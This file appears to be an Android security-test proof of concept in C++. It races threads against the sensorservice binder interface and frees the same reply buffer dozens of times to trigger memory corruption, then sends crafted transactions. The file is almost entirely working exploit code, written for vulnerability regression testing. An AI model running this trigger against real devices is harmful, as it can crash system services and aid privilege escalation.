1 /**
2 * Copyright (C) 2019 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16
17 #include "../includes/common.h"
18
19 #if _64BIT
20
21 #include <cutils/ashmem.h>
22 #include <dlfcn.h>
23 #include <fcntl.h>
24 #include <linux/futex.h>
25 #include <pthread.h>
26 #include <sensor/ISensorEventConnection.h>
27 #include <sensor/ISensorServer.h>
28 #include <sensor/Sensor.h>
29 #include <stdio.h>
30 #include <stdlib.h>
31 #include <sys/mman.h>
32 #include <sys/prctl.h>
33 #include <sys/stat.h>
34 #include <sys/syscall.h>
35 #include <sys/types.h>
36 #include <sys/wait.h>
37 #include <sys/xattr.h>
38 #include <utils/Vector.h>
39
40 #include "IPCThreadState.h"
41 #include "binder/IServiceManager.h"
42
43
44 using namespace android;
45
46 #define SLEEP 0
47 #define ATTACK 1
48 String8 packageName("hexb1n");
49 String16 opPackageName("");
50
51 time_t test_started;
52
53 static volatile int attack_signal;
my_futex(volatile int * uaddr,int op,int val,const struct timespec * timeout,int * uaddr2,int val3)54 int my_futex(volatile int *uaddr, int op, int val,
55 const struct timespec *timeout, int *uaddr2, int val3) {
56 return syscall(SYS_futex, uaddr, op, val, timeout, uaddr2, val3);
57 }
58
bcfree_helper(void * p)59 static void *bcfree_helper(void *p) {
60 (void) p;
61 Parcel data, reply;
62 sp<IServiceManager> sm = defaultServiceManager();
63 sp<IBinder> binder = sm->getService(String16("sensorservice"));
64 sp<ISensorServer> sensor = interface_cast<ISensorServer>(binder);
65 sp<ISensorEventConnection> sensorEventConnection =
66 sensor->createSensorEventConnection(packageName, 0 /*NORMAL*/,
67 opPackageName);
68 while (timer_active(test_started)) {
69 Parcel data, reply;
70 data.writeInterfaceToken(String16("android.gui.SensorEventConnection"));
71 my_futex(&attack_signal, FUTEX_WAIT_PRIVATE, SLEEP, NULL, NULL, 0);
72 usleep(100);
73 IInterface::asBinder(sensorEventConnection)
74 ->transact(4 /*FLUSH_SENSOR*/, data, &reply, 0);
75 }
76
77 return NULL;
78 }
79
bcfree(void * p)80 static void *bcfree(void *p) {
81 (void) p;
82 Parcel data, reply;
83 sp<IServiceManager> sm = defaultServiceManager();
84 sp<IBinder> binder = sm->getService(String16("sensorservice"));
85 sp<ISensorServer> sensor = interface_cast<ISensorServer>(binder);
86 sp<ISensorEventConnection> sensorEventConnection =
87 sensor->createSensorEventConnection(packageName, 0 /*NORMAL*/,
88 opPackageName);
89 while (timer_active(test_started)) {
90 Parcel data, reply;
91 data.writeInterfaceToken(String16("android.gui.SensorEventConnection"));
92
93 {
94 IInterface::asBinder(sensorEventConnection)
95 ->transact(4 /*FLUSH_SENSOR*/, data, &reply, 0);
96 const uint8_t *rmData = reply.data();
97 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
98 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
99 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
100 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
101 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
102 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
103 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
104 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
105 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
106 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
107 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
108 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
109 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
110 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
111 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
112 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
113 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
114 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
115 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
116 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
117 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
118 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
119 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
120 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
121 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
122 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
123 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
124 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
125 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
126 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
127 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
128 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
129 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
130 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
131 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
132 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
133 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
134 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
135 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
136 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
137 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
138 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
139 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
140 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
141 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
142 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
143 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
144 IPCThreadState::self()->freeBuffer(NULL, rmData, 0, NULL, 0, NULL);
145 }
146
147 attack_signal = ATTACK;
148 my_futex(&attack_signal, FUTEX_WAKE_PRIVATE, 1, NULL, NULL, 0);
149 usleep(100);
150 {
151 Parcel data, reply;
152 IInterface::asBinder(sensorEventConnection)
153 ->transact(0xdeadbfff /*FLUSH_SENSOR*/, data, &reply, 0x2f2f);
154 for (int i = 0; i < 20; i++)
155 IInterface::asBinder(sensorEventConnection)
156 ->transact(0xdeadbfff /*FLUSH_SENSOR*/, data, &reply, 0x2f2f);
157 }
158 attack_signal = SLEEP;
159 }
160
161 return NULL;
162 }
163
main()164 int main() {
165 pthread_t t1, t2, t3;
166
167 test_started = start_timer();
168
169 pthread_create(&t1, NULL, bcfree_helper, NULL);
170 pthread_create(&t2, NULL, bcfree, NULL);
171 pthread_create(&t3, NULL, bcfree_helper, NULL);
172 pthread_join(t1, NULL);
173 pthread_join(t2, NULL);
174 pthread_join(t3, NULL);
175 return EXIT_SUCCESS;
176 }
177
178 #else
main()179 int main() {
180 // do nothing on 32-bit because we can't compile on 32-bit and we need a
181 // binary to push or the filepusher will break on 32-bit.
182 }
183 #endif
184